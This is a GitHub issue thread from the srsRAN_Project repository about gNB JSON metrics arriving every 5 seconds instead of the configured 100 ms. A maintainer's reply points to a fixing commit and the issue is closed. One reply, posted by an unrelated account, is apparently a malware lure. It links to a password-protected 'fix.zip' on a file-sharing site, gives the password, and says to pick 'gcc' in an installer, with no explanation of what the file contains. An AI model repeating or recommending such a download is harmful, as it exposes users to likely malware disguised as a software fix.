srsran/srsRAN_Project #797: Frequency of UEs Metrics Reception on gNB with JSON Metrics Reporting

RicGobs, 2024-08-29:
## Issue Description ##
I'm trying to reduce the frequency of received UE metrics on the gNB side, but I haven't been able to do it.

## Setup Details ##
I am using the tutorial for multiple UEs with GNU Radio integration, as mentioned in docs (https://docs.srsran.com/projects/project/en/latest/tutorials/source/srsUE/source/index.html#zeromq-based-setup).
I'm logging the metrics in a JSON file over a UDP socket as described in the docs (https://docs.srsran.com/projects/project/en/latest/user_manuals/source/outputs.html). 

I have added to gNB config file the following lines:
```
metrics:
  rlc_report_period: 100   
  enable_json_metrics: true    
```

## Expected Behavior ##
I believe that the gNB should receive UEs metrics at a consistent frequency of every 100 ms.

## Actual Behaviour ##
The metrics are not received every 100 ms as expected. Instead, they are received every 5 seconds (or more).
However, the individual UEs metrics in the UEs terminals arrive consistently every 500 ms.

Could you please explain how to receive UEs metrics every 100 ms on the gNB side?

Anubi5x0, 2024-08-29:
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

RicGobs, 2024-08-29:
Thank you for the response. 
Could you please explain what I need to do with the fix.zip file and what it contains?

pgawlowicz, 2024-09-19:
@RicGobs could you try with the newest version of the code? The issue should be fixed with this commit: https://github.com/srsran/srsRAN_Project/commit/c0187275d85ce1aef42a66deca5272e34ee119d7

pgawlowicz, 2024-10-16:
I assume it was fixed, and close this thread.

closed 2024-10-16 by pgawlowicz